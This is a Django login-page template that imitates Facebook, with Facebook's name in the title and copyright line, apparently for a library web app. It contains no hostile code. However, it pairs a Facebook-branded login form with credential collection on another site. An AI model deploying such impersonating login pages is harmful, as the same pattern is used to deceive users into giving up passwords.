<!DOCTYPE html>
<html lang="en">
{% load static %}
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook-Login or Sign up</title>
    <link href="{% static 'login.css' %}" rel="stylesheet" media="all">
</head>
<body>
    <main>
    <form action="" method="POST">
    {% csrf_token %}
        <div class="row">
            <div class="colm-logo">
              
                <h2>Nothing is pleasanter than exploring a library</h2>
            </div>
            <div class="colm-form">
                <div class="form-container">
                    <input type="email" placeholder="Email address" name="username">
                    <input type="password" placeholder="Password" name="password">
                    <button class="btn-login">Login</button>
                    <a href="#">Forgotten password?</a>
                    <a href="register">Register</a>
                </div>
                <p><a href="#"><b>Create a Page</b></a> for a celebrity, brand or business.</p>
            </div>
        </div>
        </form>
    </main>
    <footer>
        <div class="footer-contents">
            <ol>
                <li>English (UK)</li>
                <li><a href="#">മലയാളം</a></li>
                <li><a href="#">தமிழ்</a></li>
                <li><a href="#">తెలుగు</a></li>
                <li><a href="#">বাংলা</a></li>
                <li><a href="#">اردو</a></li>
                <li><a href="#">हिन्दी</a></li>
                <li><a href="#">ಕನ್ನಡ</a></li>
                <li><a href="#">Español</a></li>
                <li><a href="#">Português (Brasil)</a></li>
                <li><a href="#">Français (France)</a></li>
                <li><button>+</button></li>
           
            
               
                
                
            </ol>
            <small>Facebook © 2022</small>
        </div>
    </footer>
</body>
</html>